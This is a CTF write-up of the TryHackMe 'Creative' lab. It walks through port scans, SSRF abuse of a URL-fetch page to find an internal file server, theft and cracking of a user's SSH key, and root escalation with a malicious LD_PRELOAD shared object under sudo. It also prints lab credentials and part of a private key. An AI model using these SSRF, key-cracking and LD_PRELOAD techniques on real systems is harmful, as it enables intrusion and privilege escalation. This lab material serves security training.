🎨Creative

License

The following post by anthonyjsaab is licensed under CC BY 4.0

0 - Introduction

Link to room: https://tryhackme.com/r/room/creative

This writeup walks you through a room on TryHackMe created by tryhackme and ssaadakhtarr

1 - Scanning

1a - Nmap

1ai - Port Discovery

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap 10.10.194.114 -sS -T5 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 10:11 EEST
Nmap scan report for 10.10.194.114
Host is up (0.11s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 130.06 seconds

1aii - Versioning

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sC -sV -p22,80 10.10.194.114 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 10:16 EEST
Nmap scan report for 10.10.194.114
Host is up (0.097s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a0:5c:1c:4e:b4:86:cf:58:9f:22:f9:7c:54:3d:7e:7b (RSA)
|   256 47:d5:bb:58:b6:c5:cc:e3:6c:0b:00:bd:95:d2:a0:fb (ECDSA)
|_  256 cb:7c:ad:31:41:bb:98:af:cf:eb:e4:88:7f:12:5e:89 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://creative.thm
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.18 seconds

1aiii - Checking for vulnerabilities

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sV --script vulners 10.10.194.114 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 10:18 EEST
Nmap scan report for 10.10.194.114
Host is up (0.099s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:8.2p1: 
|       CVE-2012-1577   7.5     https://vulners.com/cve/CVE-2012-1577
|       PRION:CVE-2020-15778    6.8     https://vulners.com/prion/PRION:CVE-2020-15778
|       CVE-2020-15778  6.8     https://vulners.com/cve/CVE-2020-15778
|       C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3    6.8     https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3       *EXPLOIT*
|       10213DBE-F683-58BB-B6D3-353173626207    6.8     https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207       *EXPLOIT*
|       PRION:CVE-2020-12062    5.0     https://vulners.com/prion/PRION:CVE-2020-12062
|       CVE-2020-12062  5.0     https://vulners.com/cve/CVE-2020-12062
|       CVE-2010-4816   5.0     https://vulners.com/cve/CVE-2010-4816
|       PRION:CVE-2021-28041    4.6     https://vulners.com/prion/PRION:CVE-2021-28041
|       CVE-2021-28041  4.6     https://vulners.com/cve/CVE-2021-28041
|       PRION:CVE-2021-41617    4.4     https://vulners.com/prion/PRION:CVE-2021-41617
|       CVE-2021-41617  4.4     https://vulners.com/cve/CVE-2021-41617
|       PRION:CVE-2020-14145    4.3     https://vulners.com/prion/PRION:CVE-2020-14145
|       PRION:CVE-2016-20012    4.3     https://vulners.com/prion/PRION:CVE-2016-20012
|       CVE-2020-14145  4.3     https://vulners.com/cve/CVE-2020-14145
|       CVE-2016-20012  4.3     https://vulners.com/cve/CVE-2016-20012
|       CVE-2023-51767  3.5     https://vulners.com/cve/CVE-2023-51767
|       PRION:CVE-2021-36368    2.6     https://vulners.com/prion/PRION:CVE-2021-36368
|_      CVE-2021-36368  2.6     https://vulners.com/cve/CVE-2021-36368
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.30 seconds

1aiv - OS Fingerprinting

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -O 10.10.194.114
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 10:20 EEST
Nmap scan report for 10.10.194.114
Host is up (0.096s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|storage-misc
Running (JUST GUESSING): Crestron 2-Series (86%), HP embedded (85%)
OS CPE: cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3
Aggressive OS guesses: Crestron XPanel control system (86%), HP P2000 G3 NAS device (85%)
No exact OS matches for host (test conditions non-ideal).

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.19 seconds

1b - Directory busting

1bi - Fixing /etc/hosts

Before executing a directory busting scan, we have to check if we can access the supposed website on the target machine normally. When we try, we find that the webserver returns this:

┌──(kali㉿kali)-[~/Desktop]
└─$ curl http://10.10.194.114 -vvv
*   Trying 10.10.194.114:80...
* Connected to 10.10.194.114 (10.10.194.114) port 80
> GET / HTTP/1.1
> Host: 10.10.194.114
> User-Agent: curl/8.5.0
> Accept: */*
> 
< HTTP/1.1 301 Moved Permanently
< Server: nginx/1.18.0 (Ubuntu)
< Date: Mon, 22 Apr 2024 07:11:40 GMT
< Content-Type: text/html
< Content-Length: 178
< Connection: keep-alive
< Location: http://creative.thm
< 
<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>
* Connection #0 to host 10.10.194.114 left intact

Thus, we should do:

┌──(kali㉿kali)-[~/Desktop]
└─$ echo "10.10.194.114\tcreative.thm" | sudo tee -a /etc/hosts 
[sudo] password for kali: 
10.10.194.114   creative.thm
                                                                             
┌──(kali㉿kali)-[~/Desktop]
└─$ cat /etc/hosts                                  
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

10.10.194.114   creative.thm

Now if we browse the website, we can see this:

1bii - Actual dirbusting

Dirbusting does not lead to anything useful

1c - Subdomain enumeration

┌──(kali㉿kali)-[~/Desktop]
└─$ awk '{ print $0 ".creative.thm" }' /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt > creative_subs.txt
                                                                                                  
┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster vhost --url creative.thm --wordlist creative_subs.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://creative.thm
[+] Method:          GET
[+] Threads:         10
[+] Wordlist:        creative_subs.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: beta.creative.thm Status: 200 [Size: 591]
Progress: 19966 / 19967 (99.99%)
===============================================================
Finished
===============================================================

1d - What we know so far

The target machine exposes 2 ports: 22 (ssh) and 80 (http)
The CVEs returned seem to be very useful.
Subdomain enumeration returned one interesting vhost to checkout

2 - beta.creative.thm

2a - First contact

This webpage is very interesting. I spin up an HTTP server on my Kali machine to see what it really does:

┌──(kali㉿kali)-[~/Desktop]
└─$ echo "10.10.4.16\tbeta.creative.thm" | sudo tee -a /etc/hosts
[sudo] password for kali: 
10.10.4.16      beta.creative.thm
                                                                               
┌──(kali㉿kali)-[~/Desktop]
└─$ mkdir testdir && cd testdir && python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.4.16 - - [22/Apr/2024 15:44:38] "GET / HTTP/1.1" 200 -

The request log shown above was triggered by manually putting "http://10.11.85.12:8000" in beta.creative.thm's input field and submitting. Here is the output on the browser:

Thus, the target machine seems to work like a forward proxy here.

2b - Python worker

Let us examine the behavior of this page further. Putting a URL to an inexistant file gives us the following:

From the user-agent shown above, and from the difference in beta's behavior when given a good or bad URL, it seems like beta launches a Python worker to download the resource requested. Then, it would send it to us. When the Python worker receives a 404, it crashes or terminates gracefully.

2c - Internal Nmap and Proxy (kinda)

When we submit http://localhost or http://127.0.0.1 in beta, it correctly returns the creative.thm webpage. However, http://localhost:22 will return "Dead".

It means that beta can tell us whether a port is locally open and bound to 127.0.0.1 on the condition that it belongs to an HTTP server. We can use beta as an Nmap for HTTP servers, and the scan is launched from the target machine, not our IP address.

┌──(kali㉿kali)-[~/Desktop/testdir]
└─$ cat generate_port_list.py 
#!/usr/bin/python3
nh = open("ports.txt", "w")
for i in range(2**16):
        nh.write(f"{i}\n")
nh.close()

                                                                                                                                
┌──(kali㉿kali)-[~/Desktop/testdir]
└─$ ./generate_port_list.py             

┌──(kali㉿kali)-[~/Desktop/testdir]
└─$ gobuster fuzz --method "POST" --body "url=http://localhost:FUZZ/" -H 'Content-Type: application/x-www-form-urlencoded' --exclude-length 13 --url "http://beta.creative.thm" -w ports.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:              http://beta.creative.thm
[+] Method:           POST
[+] Threads:          10
[+] Wordlist:         ports.txt
[+] Exclude Length:   13
[+] User Agent:       gobuster/3.6
[+] Timeout:          10s
===============================================================
Starting gobuster in fuzzing mode
===============================================================
Found: [Status=200] [Length=37589] [Word=0] http://beta.creative.thm
                                                                                                                                
Found: [Status=200] [Length=37589] [Word=80] http://beta.creative.thm
                                                                                                                                
Found: [Status=200] [Length=1143] [Word=1337] http://beta.creative.thm
                                                                          
Progress: 65536 / 65537 (100.00%)
===============================================================
Finished
===============================================================

In the above code block, I've generated a list of all possible ports. Then, using a sample request-response pair from beta.creative.thm, I crafted a gobuster incantation that communicates correctly with the endpoint. It sends to the same endpoint 2^32 requests that differ only by the port included in the body. For any particular response, if the length is 13, it means the server returned "Dead". Thus, we excluded this case.

As we can see, we found that an HTTP server is bound to 127.0.0.1:1337 of the target machine.

When we request this page via our forward proxy (aka beta.creative.thm), we get this:

Voila! The HTTP server at 127.0.0.1:1337 returns a directory listing at the root of the filesystem! This is cool. However, each time we want to access a file or change directory, we need to go back to beta's landing page and submit the new path. It is not quite like a shell.

Unfortunately, we cannot access /root/ just yet. However, we can access /home/ and we see this:

We have our first flag! user.txt is here and we can access it. Now, to have a decent shell so we can continue to priv esc, we can go to .ssh and retrieve the private keys of the "saad" user.

3 - Foothold using saad account

Using the above SSH private key, we can try to login to the target machine:

┌──(kali㉿kali)-[~/Downloads]
└─$ nano id_rsa                      
                                          
┌──(kali㉿kali)-[~/Downloads]
└─$ head id_rsa                      
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABA1J8+LAd
rb49YHdSMzgX80AAAAEAAAAAEAAAGXAAAAB3NzaC1yc2EAAAADAQABAAABgQDBbWMPTToe
wBK40FcBuzcLlzjLtfa21TgQxhjBYMPUvwzbgiGpJYEd6sXKeh9FXGYcgXCduq3rz/PSCs
48K+nYJ6Snob95PhfKfFL3x8JMc3sABvU87QxrJQ3PFsYmEzd38tmTiMQkn08Wf7g13MJ6
LzfUwwv9QZXMujHpExowWuwlEKBYiPeEK7mGvS0jJLsaEpQorZNvUhrUO4frSQA6/OTmXE
d/hMX2910cAiCa5NlgBn4nH8y5bjSrygFUSVJiMBVUY0H77mj6gmJUoz5jv96fV+rBaFoB
LGOy00gbX+2YTzBIJsKwOG97Q3HMnMKH+vCL09h/i3nQodWdqLP73U0PK2pu/nUFvGE8ju
nkkRVNqqO5m0eYfdkWHLKz13JzohUBBsLrtj6c9hc8CIqErf5B573RKdhu4gy4JkCMEW1D
xKhNWu+TI3VME1Q0ThJII/TMCR+Ih+/IDwgVTaW0LJR6Cn5nZzUHBLjkDV66vJRYN/3dJ5
                                 
┌──(kali㉿kali)-[~/Downloads]
└─$ chmod 700 id_rsa                 
               
┌──(kali㉿kali)-[~/Downloads]
└─$ ssh -i ./id_rsa [email protected]
Enter passphrase for key './id_rsa':

We have a small problem. We do not know the SSH key's passphrase. We have to crack it.

3b - Cracking the passphrase

┌──(kali㉿kali)-[~/Downloads]
└─$ ssh2john id_rsa > saad.hash       

┌──(kali㉿kali)-[~/Downloads]
└─$ john --wordlist=/usr/share/wordlists/seclists/Passwords/probable-v2-top12000.txt saad.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sweetness        (id_rsa)     
1g 0:00:00:29 DONE (2024-05-04 11:23) 0.03444g/s 82.67p/s 82.67c/s 82.67C/s alexia..grateful
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Sweet! We cracked the passphrase.

3c - Foothold

┌──(kali㉿kali)-[~/Downloads]
└─$ ssh -i ./id_rsa [email protected]
Enter passphrase for key './id_rsa': 
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 04 May 2024 08:25:43 AM UTC

  System load:  0.0               Processes:             115
  Usage of /:   57.3% of 8.02GB   Users logged in:       0
  Memory usage: 26%               IPv4 address for eth0: 10.10.2.249
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

58 updates can be applied immediately.
33 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Nov  6 07:56:40 2023 from 192.168.8.102
saad@m4lware:~$ ls -la
total 52
drwxr-xr-x 7 saad saad 4096 Jan 21  2023 .
drwxr-xr-x 3 root root 4096 Jan 20  2023 ..
-rw------- 1 saad saad  362 Jan 21  2023 .bash_history
-rw-r--r-- 1 saad saad  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 saad saad 3797 Jan 21  2023 .bashrc
drwx------ 2 saad saad 4096 Jan 20  2023 .cache
drwx------ 3 saad saad 4096 Jan 20  2023 .gnupg
drwxrwxr-x 3 saad saad 4096 Jan 20  2023 .local
-rw-r--r-- 1 saad saad  807 Feb 25  2020 .profile
drwx------ 3 saad saad 4096 Jan 20  2023 snap
drwx------ 2 saad saad 4096 Jan 21  2023 .ssh
-rwxr-xr-x 1 root root  150 Jan 20  2023 start_server.py
-rw-r--r-- 1 saad saad    0 Jan 20  2023 .sudo_as_admin_successful
-rw-rw---- 1 saad saad   33 Jan 21  2023 user.txt
saad@m4lware:~$

4 - PrivEsc

First of all, we can find the password of the saad account in the bash history:

saad@m4lware:~$ head .bash_history 
whoami
pwd
ls -al
ls
cd ..
sudo -l
echo "saad:MyStrongestPasswordYet$4291" > creds.txt
rm creds.txt
sudo -l
whomai

We can now proceed with some classical manual enumeration commands:

saad@m4lware:~$ sudo -l
[sudo] password for saad: 
Matching Defaults entries for saad on m4lware:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    env_keep+=LD_PRELOAD

User saad may run the following commands on m4lware:
    (root) /usr/bin/ping
saad@m4lware:~$

Using ping as root does not help us. However, using ping as root while overwriting the LD_PRELOAD variable effectively lets us run anything as root!

saad@m4lware:~$ cat shared_bash.c 
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
saad@m4lware:~$ gcc -fPIC -shared -o shell.so shared_bash.c -nostartfiles
shared_bash.c: In function ‘_init’:
shared_bash.c:7:1: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
    7 | setgid(0);
      | ^~~~~~
shared_bash.c:8:1: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
    8 | setuid(0);
      | ^~~~~~
saad@m4lware:~$ sudo LD_PRELOAD=shell.so ping
ERROR: ld.so: object 'shell.so' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
ping: usage error: Destination address required
saad@m4lware:~$ sudo LD_PRELOAD=/home/saad/shell.so ping
root@m4lware:/home/saad# whoami
root
root@m4lware:/home/saad# ls /root
root.txt  snap
root@m4lware:/home/saad#

PreviousCat Pictures 2 NextCyberLens

Last updated 1 year ago

hashtagLicense

hashtag0 - Introduction

hashtag1 - Scanning

hashtag1a - Nmap

hashtag1ai - Port Discovery

hashtag1aii - Versioning

hashtag1aiii - Checking for vulnerabilities

hashtag1aiv - OS Fingerprinting

hashtag1b - Directory busting

hashtag1c - Subdomain enumeration

hashtag1d - What we know so far

hashtag2 - beta.creative.thm

hashtag2a - First contact

hashtag2b - Python worker

hashtag2c - Internal Nmap and Proxy (kinda)

hashtag3 - Foothold using saad account

hashtag3a - Trying to login

hashtag3b - Cracking the passphrase

hashtag3c - Foothold

hashtag4 - PrivEsc